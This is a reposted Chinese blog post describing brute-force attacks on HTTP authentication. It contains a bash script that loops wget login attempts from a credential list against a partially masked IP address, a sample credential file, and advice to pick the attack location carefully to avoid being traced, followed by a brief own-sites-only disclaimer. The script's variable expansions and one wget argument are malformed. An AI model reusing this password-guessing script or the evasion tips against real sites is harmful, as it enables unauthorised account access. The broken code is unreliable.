暴力破解HTTP驗證

首先，你總得有像樣的字典吧。去國外網站上下wordlist吧，或者自己寫個簡單的程式來生成字典。如果不會寫程式，呵呵呵呵，那就下載下傳字典生成程式吧 。（不過網上下的wordlist，或者用網上下的字典生成程式生成的字典，好像都不好用）

當然，也可以自己寫工具。筆者就寫了一個簡單的腳本來幹活：

#!/bin/bash

#

user_password_file=/root/wget_cracker_user_password

while read user_password ; do

 user=$(user_password#:}

 password=$(user_password%:}

 wget -q -t 2 -T 15 --http-user=$user --http-password=$password -http://219.136.x.x:8080/tool.asp 

 if [ $? -eq 0 ] ; then

  echo "OK I got an password:     user: $user ; password: $password !"

        exit 0

 fi

done < $user_password_file

exit 0

-bash-3.00# cat wget_cracker_user_password 

abc:adeeffaf

deff:afkafsasf

guest:affaewf

guest:guest

guest:afdasf

再次，你應該清楚：暴力破解不是SYN攻擊，IP 欺騙是不可能的，你的老巢在哪裡，受害者一眼就能看出來。是以，好好選擇“狙擊地”吧。搞不好會吃官司的哦。

最後，本人進行HTTP驗證暴力破解，隻是驗證自己保護的WEB頁面密碼的強度，絕不會去給别人的網站添麻煩。切記。

本文轉自zkjian517 51CTO部落格，原文連結:http://blog.51cto.com/zoukejian/57619